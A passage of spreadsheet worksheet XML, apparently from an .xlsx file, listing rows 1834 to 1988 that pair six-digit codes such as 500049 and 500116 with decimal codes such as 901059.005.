      </c>
    </row>
    <row r="1834" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1834" s="5">
        <v>500049</v>
      </c>
      <c r="B1834" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1835" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1835" s="5">
        <v>500049</v>
      </c>
      <c r="B1835" s="3">
        <v>901555</v>
      </c>
    </row>
    <row r="1836" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1836" s="5">
        <v>500049</v>
      </c>
      <c r="B1836" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="1837" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1837" s="5">
        <v>500049</v>
      </c>
      <c r="B1837" s="3">
        <v>901555.00399999996</v>
      </c>
    </row>
    <row r="1838" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1838" s="5">
        <v>500049</v>
      </c>
      <c r="B1838" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="1839" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1839" s="5">
        <v>500049</v>
      </c>
      <c r="B1839" s="3">
        <v>901573.00199999998</v>
      </c>
    </row>
    <row r="1840" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1840" s="5">
        <v>500049</v>
      </c>
      <c r="B1840" s="3">
        <v>901048.00300000003</v>
      </c>
    </row>
    <row r="1841" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1841" s="5">
        <v>500049</v>
      </c>
      <c r="B1841" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="1842" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1842" s="5">
        <v>500049</v>
      </c>
      <c r="B1842" s="3">
        <v>901008</v>
      </c>
    </row>
    <row r="1843" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1843" s="5">
        <v>500049</v>
      </c>
      <c r="B1843" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="1844" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1844" s="5">
        <v>500049</v>
      </c>
      <c r="B1844" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1845" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1845" s="5">
        <v>500049</v>
      </c>
      <c r="B1845" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="1846" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1846" s="5">
        <v>500049</v>
      </c>
      <c r="B1846" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="1847" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1847" s="5">
        <v>500049</v>
      </c>
      <c r="B1847" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="1848" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1848" s="5">
        <v>500049</v>
      </c>
      <c r="B1848" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1849" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1849" s="5">
        <v>500049</v>
      </c>
      <c r="B1849" s="3">
        <v>901027.005</v>
      </c>
    </row>
    <row r="1850" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1850" s="5">
        <v>500049</v>
      </c>
      <c r="B1850" s="3">
        <v>901137.00399999996</v>
      </c>
    </row>
    <row r="1851" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1851" s="5">
        <v>500049</v>
      </c>
      <c r="B1851" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1852" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1852" s="5">
        <v>500049</v>
      </c>
      <c r="B1852" s="3">
        <v>901003.00399999996</v>
      </c>
    </row>
    <row r="1853" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1853" s="5">
        <v>500049</v>
      </c>
      <c r="B1853" s="3">
        <v>901003.005</v>
      </c>
    </row>
    <row r="1854" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1854" s="5">
        <v>500049</v>
      </c>
      <c r="B1854" s="3">
        <v>901201</v>
      </c>
    </row>
    <row r="1855" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1855" s="5">
        <v>500049</v>
      </c>
      <c r="B1855" s="3">
        <v>901120</v>
      </c>
    </row>
    <row r="1856" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1856" s="5">
        <v>500049</v>
      </c>
      <c r="B1856" s="3">
        <v>901069.00100000005</v>
      </c>
    </row>
    <row r="1857" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1857" s="5">
        <v>500049</v>
      </c>
      <c r="B1857" s="3">
        <v>901069.00199999998</v>
      </c>
    </row>
    <row r="1858" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1858" s="5">
        <v>500049</v>
      </c>
      <c r="B1858" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1859" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1859" s="5">
        <v>500049</v>
      </c>
      <c r="B1859" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="1860" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1860" s="5">
        <v>500049</v>
      </c>
      <c r="B1860" s="3">
        <v>901566.00300000003</v>
      </c>
    </row>
    <row r="1861" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1861" s="5">
        <v>500049</v>
      </c>
      <c r="B1861" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="1862" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1862" s="5">
        <v>500049</v>
      </c>
      <c r="B1862" s="3">
        <v>901572</v>
      </c>
    </row>
    <row r="1863" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1863" s="5">
        <v>500049</v>
      </c>
      <c r="B1863" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="1864" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1864" s="5">
        <v>500049</v>
      </c>
      <c r="B1864" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="1865" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1865" s="5">
        <v>500049</v>
      </c>
      <c r="B1865" s="3">
        <v>901021.00399999996</v>
      </c>
    </row>
    <row r="1866" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1866" s="5">
        <v>500049</v>
      </c>
      <c r="B1866" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1867" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1867" s="5">
        <v>500049</v>
      </c>
      <c r="B1867" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="1868" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1868" s="5">
        <v>500049</v>
      </c>
      <c r="B1868" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="1869" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1869" s="5">
        <v>500049</v>
      </c>
      <c r="B1869" s="3">
        <v>901218.00100000005</v>
      </c>
    </row>
    <row r="1870" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1870" s="5">
        <v>500049</v>
      </c>
      <c r="B1870" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1871" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1871" s="5">
        <v>500049</v>
      </c>
      <c r="B1871" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1872" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1872" s="5">
        <v>500049</v>
      </c>
      <c r="B1872" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="1873" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1873" s="5">
        <v>500049</v>
      </c>
      <c r="B1873" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="1874" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1874" s="5">
        <v>500049</v>
      </c>
      <c r="B1874" s="3">
        <v>901007</v>
      </c>
    </row>
    <row r="1875" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1875" s="5">
        <v>500049</v>
      </c>
      <c r="B1875" s="3">
        <v>901552.00100000005</v>
      </c>
    </row>
    <row r="1876" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1876" s="5">
        <v>500049</v>
      </c>
      <c r="B1876" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="1877" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1877" s="5">
        <v>500049</v>
      </c>
      <c r="B1877" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1878" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1878" s="5">
        <v>500049</v>
      </c>
      <c r="B1878" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="1879" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1879" s="5">
        <v>500049</v>
      </c>
      <c r="B1879" s="3">
        <v>901497.00100000005</v>
      </c>
    </row>
    <row r="1880" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1880" s="5">
        <v>500049</v>
      </c>
      <c r="B1880" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1881" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1881" s="5">
        <v>500116</v>
      </c>
      <c r="B1881" s="3">
        <v>901087.00199999998</v>
      </c>
    </row>
    <row r="1882" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1882" s="5">
        <v>500116</v>
      </c>
      <c r="B1882" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="1883" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1883" s="5">
        <v>500116</v>
      </c>
      <c r="B1883" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="1884" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1884" s="5">
        <v>500116</v>
      </c>
      <c r="B1884" s="3">
        <v>901115</v>
      </c>
    </row>
    <row r="1885" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1885" s="5">
        <v>500116</v>
      </c>
      <c r="B1885" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1886" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1886" s="5">
        <v>500116</v>
      </c>
      <c r="B1886" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1887" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1887" s="5">
        <v>500116</v>
      </c>
      <c r="B1887" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1888" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1888" s="5">
        <v>500116</v>
      </c>
      <c r="B1888" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="1889" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1889" s="5">
        <v>500116</v>
      </c>
      <c r="B1889" s="3">
        <v>901555.005</v>
      </c>
    </row>
    <row r="1890" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1890" s="5">
        <v>500116</v>
      </c>
      <c r="B1890" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1891" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1891" s="5">
        <v>500116</v>
      </c>
      <c r="B1891" s="3">
        <v>901001</v>
      </c>
    </row>
    <row r="1892" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1892" s="5">
        <v>500116</v>
      </c>
      <c r="B1892" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="1893" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1893" s="5">
        <v>500116</v>
      </c>
      <c r="B1893" s="3">
        <v>901573.00199999998</v>
      </c>
    </row>
    <row r="1894" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1894" s="5">
        <v>500116</v>
      </c>
      <c r="B1894" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="1895" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1895" s="5">
        <v>500116</v>
      </c>
      <c r="B1895" s="3">
        <v>901190</v>
      </c>
    </row>
    <row r="1896" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1896" s="5">
        <v>500116</v>
      </c>
      <c r="B1896" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="1897" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1897" s="5">
        <v>500116</v>
      </c>
      <c r="B1897" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1898" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1898" s="5">
        <v>500116</v>
      </c>
      <c r="B1898" s="3">
        <v>901562.00399999996</v>
      </c>
    </row>
    <row r="1899" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1899" s="5">
        <v>500116</v>
      </c>
      <c r="B1899" s="3">
        <v>901070.00100000005</v>
      </c>
    </row>
    <row r="1900" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1900" s="5">
        <v>500116</v>
      </c>
      <c r="B1900" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="1901" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1901" s="5">
        <v>500116</v>
      </c>
      <c r="B1901" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1902" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1902" s="5">
        <v>500116</v>
      </c>
      <c r="B1902" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="1903" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1903" s="5">
        <v>500116</v>
      </c>
      <c r="B1903" s="3">
        <v>901570</v>
      </c>
    </row>
    <row r="1904" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1904" s="5">
        <v>500116</v>
      </c>
      <c r="B1904" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="1905" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1905" s="5">
        <v>500116</v>
      </c>
      <c r="B1905" s="3">
        <v>901106</v>
      </c>
    </row>
    <row r="1906" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1906" s="5">
        <v>500116</v>
      </c>
      <c r="B1906" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="1907" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1907" s="5">
        <v>500116</v>
      </c>
      <c r="B1907" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="1908" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1908" s="5">
        <v>500116</v>
      </c>
      <c r="B1908" s="3">
        <v>901095</v>
      </c>
    </row>
    <row r="1909" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1909" s="5">
        <v>500116</v>
      </c>
      <c r="B1909" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1910" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1910" s="5">
        <v>500116</v>
      </c>
      <c r="B1910" s="3">
        <v>901027.005</v>
      </c>
    </row>
    <row r="1911" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1911" s="5">
        <v>500116</v>
      </c>
      <c r="B1911" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="1912" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1912" s="5">
        <v>500116</v>
      </c>
      <c r="B1912" s="3">
        <v>901003.00600000005</v>
      </c>
    </row>
    <row r="1913" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1913" s="5">
        <v>500116</v>
      </c>
      <c r="B1913" s="3">
        <v>901120</v>
      </c>
    </row>
    <row r="1914" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1914" s="5">
        <v>500116</v>
      </c>
      <c r="B1914" s="3">
        <v>901069.00100000005</v>
      </c>
    </row>
    <row r="1915" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1915" s="5">
        <v>500116</v>
      </c>
      <c r="B1915" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="1916" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1916" s="5">
        <v>500116</v>
      </c>
      <c r="B1916" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="1917" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1917" s="5">
        <v>500116</v>
      </c>
      <c r="B1917" s="3">
        <v>901090</v>
      </c>
    </row>
    <row r="1918" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1918" s="5">
        <v>500116</v>
      </c>
      <c r="B1918" s="3">
        <v>901090.00100000005</v>
      </c>
    </row>
    <row r="1919" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1919" s="5">
        <v>500116</v>
      </c>
      <c r="B1919" s="3">
        <v>901090.00300000003</v>
      </c>
    </row>
    <row r="1920" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1920" s="5">
        <v>500116</v>
      </c>
      <c r="B1920" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="1921" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1921" s="5">
        <v>500116</v>
      </c>
      <c r="B1921" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="1922" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1922" s="5">
        <v>500116</v>
      </c>
      <c r="B1922" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="1923" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1923" s="5">
        <v>500116</v>
      </c>
      <c r="B1923" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1924" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1924" s="5">
        <v>500116</v>
      </c>
      <c r="B1924" s="3">
        <v>901505.00300000003</v>
      </c>
    </row>
    <row r="1925" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1925" s="5">
        <v>500116</v>
      </c>
      <c r="B1925" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="1926" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1926" s="5">
        <v>500116</v>
      </c>
      <c r="B1926" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="1927" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1927" s="5">
        <v>500116</v>
      </c>
      <c r="B1927" s="3">
        <v>901558.00300000003</v>
      </c>
    </row>
    <row r="1928" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1928" s="5">
        <v>500116</v>
      </c>
      <c r="B1928" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1929" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1929" s="5">
        <v>500116</v>
      </c>
      <c r="B1929" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1930" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1930" s="5">
        <v>500116</v>
      </c>
      <c r="B1930" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="1931" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1931" s="5">
        <v>500116</v>
      </c>
      <c r="B1931" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="1932" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1932" s="5">
        <v>500116</v>
      </c>
      <c r="B1932" s="3">
        <v>901007</v>
      </c>
    </row>
    <row r="1933" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1933" s="5">
        <v>500116</v>
      </c>
      <c r="B1933" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="1934" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1934" s="5">
        <v>500116</v>
      </c>
      <c r="B1934" s="3">
        <v>901124</v>
      </c>
    </row>
    <row r="1935" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1935" s="5">
        <v>500116</v>
      </c>
      <c r="B1935" s="3">
        <v>901111</v>
      </c>
    </row>
    <row r="1936" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1936" s="5">
        <v>500116</v>
      </c>
      <c r="B1936" s="3">
        <v>901552.00399999996</v>
      </c>
    </row>
    <row r="1937" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1937" s="5">
        <v>500116</v>
      </c>
      <c r="B1937" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="1938" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1938" s="5">
        <v>500116</v>
      </c>
      <c r="B1938" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="1939" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1939" s="5">
        <v>500116</v>
      </c>
      <c r="B1939" s="3">
        <v>901078.00300000003</v>
      </c>
    </row>
    <row r="1940" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1940" s="5">
        <v>500116</v>
      </c>
      <c r="B1940" s="3">
        <v>901047</v>
      </c>
    </row>
    <row r="1941" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1941" s="5">
        <v>500071</v>
      </c>
      <c r="B1941" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="1942" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1942" s="5">
        <v>500071</v>
      </c>
      <c r="B1942" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="1943" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1943" s="5">
        <v>500040</v>
      </c>
      <c r="B1943" s="3">
        <v>901548.00199999998</v>
      </c>
    </row>
    <row r="1944" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1944" s="5">
        <v>500040</v>
      </c>
      <c r="B1944" s="3">
        <v>901560</v>
      </c>
    </row>
    <row r="1945" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1945" s="5">
        <v>500040</v>
      </c>
      <c r="B1945" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="1946" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1946" s="5">
        <v>500040</v>
      </c>
      <c r="B1946" s="3">
        <v>901197</v>
      </c>
    </row>
    <row r="1947" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1947" s="5">
        <v>500040</v>
      </c>
      <c r="B1947" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="1948" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1948" s="5">
        <v>500040</v>
      </c>
      <c r="B1948" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1949" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1949" s="5">
        <v>500040</v>
      </c>
      <c r="B1949" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="1950" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1950" s="5">
        <v>500040</v>
      </c>
      <c r="B1950" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1951" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1951" s="5">
        <v>500040</v>
      </c>
      <c r="B1951" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="1952" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1952" s="5">
        <v>500040</v>
      </c>
      <c r="B1952" s="3">
        <v>901132.00100000005</v>
      </c>
    </row>
    <row r="1953" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1953" s="5">
        <v>500040</v>
      </c>
      <c r="B1953" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1954" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1954" s="5">
        <v>500040</v>
      </c>
      <c r="B1954" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="1955" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1955" s="5">
        <v>500040</v>
      </c>
      <c r="B1955" s="3">
        <v>901587.00199999998</v>
      </c>
    </row>
    <row r="1956" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1956" s="5">
        <v>500040</v>
      </c>
      <c r="B1956" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="1957" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1957" s="5">
        <v>500040</v>
      </c>
      <c r="B1957" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="1958" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1958" s="5">
        <v>500040</v>
      </c>
      <c r="B1958" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="1959" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1959" s="5">
        <v>500040</v>
      </c>
      <c r="B1959" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="1960" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1960" s="5">
        <v>500040</v>
      </c>
      <c r="B1960" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="1961" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1961" s="5">
        <v>500040</v>
      </c>
      <c r="B1961" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1962" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1962" s="5">
        <v>500040</v>
      </c>
      <c r="B1962" s="3">
        <v>901559.00199999998</v>
      </c>
    </row>
    <row r="1963" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1963" s="5">
        <v>500040</v>
      </c>
      <c r="B1963" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="1964" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1964" s="5">
        <v>500040</v>
      </c>
      <c r="B1964" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="1965" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1965" s="5">
        <v>500040</v>
      </c>
      <c r="B1965" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="1966" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1966" s="5">
        <v>500040</v>
      </c>
      <c r="B1966" s="3">
        <v>901027.00100000005</v>
      </c>
    </row>
    <row r="1967" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1967" s="5">
        <v>500040</v>
      </c>
      <c r="B1967" s="3">
        <v>901027.00199999998</v>
      </c>
    </row>
    <row r="1968" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1968" s="5">
        <v>500040</v>
      </c>
      <c r="B1968" s="3">
        <v>901027.005</v>
      </c>
    </row>
    <row r="1969" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1969" s="5">
        <v>500040</v>
      </c>
      <c r="B1969" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1970" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1970" s="5">
        <v>500040</v>
      </c>
      <c r="B1970" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="1971" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1971" s="5">
        <v>500040</v>
      </c>
      <c r="B1971" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="1972" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1972" s="5">
        <v>500040</v>
      </c>
      <c r="B1972" s="3">
        <v>901055.01199999999</v>
      </c>
    </row>
    <row r="1973" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1973" s="5">
        <v>500040</v>
      </c>
      <c r="B1973" s="3">
        <v>901021.00100000005</v>
      </c>
    </row>
    <row r="1974" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1974" s="5">
        <v>500040</v>
      </c>
      <c r="B1974" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1975" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1975" s="5">
        <v>500040</v>
      </c>
      <c r="B1975" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="1976" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1976" s="5">
        <v>500040</v>
      </c>
      <c r="B1976" s="3">
        <v>901553.00199999998</v>
      </c>
    </row>
    <row r="1977" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1977" s="5">
        <v>500040</v>
      </c>
      <c r="B1977" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="1978" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1978" s="5">
        <v>500040</v>
      </c>
      <c r="B1978" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="1979" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1979" s="5">
        <v>500040</v>
      </c>
      <c r="B1979" s="3">
        <v>901204.00100000005</v>
      </c>
    </row>
    <row r="1980" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1980" s="5">
        <v>500040</v>
      </c>
      <c r="B1980" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="1981" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1981" s="5">
        <v>500040</v>
      </c>
      <c r="B1981" s="3">
        <v>901102.00100000005</v>
      </c>
    </row>
    <row r="1982" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1982" s="5">
        <v>500011</v>
      </c>
      <c r="B1982" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="1983" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1983" s="5">
        <v>500011</v>
      </c>
      <c r="B1983" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="1984" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1984" s="5">
        <v>500068</v>
      </c>
      <c r="B1984" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="1985" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1985" s="5">
        <v>500068</v>
      </c>
      <c r="B1985" s="3">
        <v>901068</v>
      </c>
    </row>
    <row r="1986" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1986" s="5">
        <v>500068</v>
      </c>
      <c r="B1986" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="1987" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1987" s="5">
        <v>500068</v>
      </c>
      <c r="B1987" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="1988" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1988" s="5">
        <v>500068</v>
      </c>
      <c r="B1988" s="3">
        <v>901056.00399999996</v>
      </c>
    </row>
